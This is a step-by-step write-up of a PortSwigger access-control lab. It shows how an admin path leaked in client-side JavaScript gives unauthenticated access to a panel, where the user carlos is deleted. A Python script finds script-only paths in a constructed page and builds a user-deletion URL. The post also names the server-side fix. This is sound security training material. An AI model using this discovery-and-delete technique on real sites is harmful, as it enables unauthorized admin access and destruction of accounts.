In this post we will walk step by step through how to solve ‘Unprotected admin functionality with unpredictable URL’ on PortSwigger. This lab’s difficulty is Apprentice and it is the second lab in the Access control labs on PortSwigger.
To start the lab, click the ‘Access the Lab’ button. A modern browser is all we need to solve this lab: viewing the page source and following a link is enough.
Starting the lab we are presented with a shop page that displays multiple categories. Don’t stress if your categories are different from the screenshot: PortSwigger labs can change content each time a lab is started.
The page source contains client-side JavaScript that only adds an ‘Admin panel’ link when the current user is an admin, but the admin path is hard-coded in that script, so anyone who views the source can read it. Navigating to that path, /admin-lxlj21 in this instance (it changes per lab), we discover an unprotected admin panel that lets an unauthenticated user delete accounts. The unpredictable path is the only thing ‘protecting’ it: the server never checks who is making the request, which is why a single leaked URL is a full access-control bypass.
Deleting the user carlos from the admin panel solves the lab.
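As an added example, not part of the original walkthrough, the script below automates the discovery step against a constructed page: it collects the paths exposed as real links, pulls path-like string literals out of inline JavaScript, and reports any path that the script knows about but the page never links to. The sample HTML is constructed for this example and is not captured from the lab; the `/delete?username=` shape of the deletion URL is an assumption, and the base URL `https://example.test` is a placeholder.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlencode

# Constructed sample page, modelled on the way a shop page can leak an admin
# path inside client-side script that only renders the link for admins.
# It is not captured from the lab.
SAMPLE_HTML = """
<html><body>
<section class="top-links">
  <a href="/">Home</a><a href="/my-account">My account</a>
</section>
<script>
var isAdmin = false;
if (isAdmin) {
  var topLinksTag = document.getElementsByClassName("top-links")[0];
  var adminPanelTag = document.createElement('a');
  adminPanelTag.setAttribute('href', '/admin-lxlj21');
  adminPanelTag.innerText = 'Admin panel';
  topLinksTag.append(adminPanelTag);
}
</script>
</body></html>
"""

# A JavaScript string literal that looks like an absolute URL path.
PATH_LITERAL = re.compile(r"""["'](/[\w\-./]*)["']""")


class _PageCollector(HTMLParser):
    """Collect anchor hrefs and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.hrefs = set()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.add(href)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_hidden_paths(html):
    """Return paths referenced in inline scripts but never exposed as a link.

    The browser only renders links the script decides to create, so a path
    that appears in script text but in no <a href> is a candidate hidden
    endpoint worth visiting directly.
    """
    page = _PageCollector()
    page.feed(html)
    in_scripts = set()
    for script in page.scripts:
        in_scripts.update(PATH_LITERAL.findall(script))
    return sorted(in_scripts - page.hrefs)


def build_delete_url(base_url, admin_path, username):
    """Build the user-deletion URL for a discovered admin path.

    The '/delete?username=' shape is an assumption for this example; read the
    real form action and parameter names from the admin page before sending
    anything.
    """
    endpoint = urljoin(base_url, admin_path.rstrip("/") + "/delete")
    return endpoint + "?" + urlencode({"username": username})


if __name__ == "__main__":
    hidden = find_hidden_paths(SAMPLE_HTML)
    print("paths referenced only in script:", hidden)
    for path in hidden:
        print(build_delete_url("https://example.test", path, "carlos"))
```

Running it prints `/admin-lxlj21` as the only path the page knows about but never links to, which is exactly the signal to go and request it without logging in. The fix on the server side is not a harder-to-guess path but an authorization check on every request under the admin prefix, tied to the caller’s session and role.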
That completes the lab! Well done! If you found this helpful, please send me a tweet and tell me what you thought! Feedback is always appreciated!